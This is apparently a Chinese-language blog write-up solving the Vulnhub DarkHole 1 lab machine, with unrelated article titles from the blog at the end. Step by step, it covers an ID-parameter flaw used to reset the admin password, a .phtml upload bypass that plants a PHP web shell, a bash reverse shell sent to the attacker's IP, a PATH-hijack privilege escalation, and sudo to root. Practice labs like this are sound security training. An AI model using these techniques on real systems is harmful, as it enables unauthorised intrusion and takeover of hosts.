Vulnhub-DarkHole_1-Writeup

靶机地址:DARKHOLE: 1

Difficulty: Easy

扫描与发现

使用arp-scan发现目标IP

arp-scan -l

使用nmap扫描开放端口

nmap -sV -p- 192.168.164.193

目标探索

打开目标80端口发现没什么东西,查看源代码也没什么,只有一个登录连接

我们点进登录页面

想到可能是SQL注入,但是尝试之后没有结果。发现可以注册,输入用户名邮箱密码很容易可以注册成功,立马想到这里可能存在逻辑漏洞。登录之后是这样的

web shell

这里有更新数据功能,打开Burpsuite工具进行抓包,尝试修改admin用户的信息。设置用户名为admin,密码自己设置一个,比如123123,然后点击修改密码,抓包

数据包如下

这里应该是通过参数id值来修改对应用户密码的,我们将id值改为1,对应修改成admin密码,放出数据包提示密码修改成功,然后我们用admin账户登录,密码123123,登录成功,界面如下。

admin登录后多出来一个Upload功能,应该是利用文件上传拿到网站shell,经过探索后发现可以通过后缀.phtml绕过上传php脚本。可以上传一句话木马然后用蚁剑连接,获得虚拟终端

利用bash,反弹一个shell给kali

bash -c 'bash -i >& /dev/tcp/192.168.164.179/9999 0>&1'

用户shell

来到/home/john目录下发现有一个toto二进制文件执行id命令

发现uid为john,可以利用环境变量来切换得到john用户shell。在/tmp目录下

echo "/bin/bash" > /tmp/id
chmod +x /tmp/id
export PATH=/tmp:$PATH
./toto

root权限

拿到john权限后查看password文件,发现内容为root123

尝试用该密码进行ssh连接,发现可以连上darkhole用户。利用sudo发现其可以升为root

直接利用sudo提权,拿到flag

最新文章

  1. java内存泄漏的经典案例
  2. orm获取关联表里的属性值
  3. JVM字节码之整型入栈指令(iconst、bipush、sipush、ldc)
  4. paip.python php的未来预测以及它们的比较优缺点
  5. Android_时间服务
  6. HttpWebRequest 基础连接已经关闭: 接收时发生错误
  7. html5新增标签集锦
  8. TortoiseGit使用SSH
  9. 人工神经网络,支持任意数量隐藏层,多层隐藏层,python代码分享
  10. 1.17学习jquery权威指南
  11. Thinkphp5.1 ORM UML
  12. 设置redis服务开机自启动
  13. 【转】C++拷贝构造函数详解
  14. python自学第9天,装饰器
  15. 【读书笔记】iOS-自动布局
  16. Android http通信案例
  17. Django本地开发,debug模式引用静态文件
  18. [Firebase] 2. Firebase Event Handling
  19. rsync之脑袋疼
  20. C# winfrom 存取图片到数据库(二进制,image)

热门文章

  1. Ajax样例
  2. cs224n 2019
  3. 注解,@Qualifier+@Autowired 和 @Resource
  4. 无网络下,配置yum本地源
  5. Noip模拟37 2021.8.12
  6. [调试笔记] 10.8模拟赛11 T4 甜圈
  7. PriorityQueue(优先队列)
  8. Vulnhub实战-dr4g0n b4ll靶机👻
  9. 自定义容器tomcat应用
  10. pip 更新方法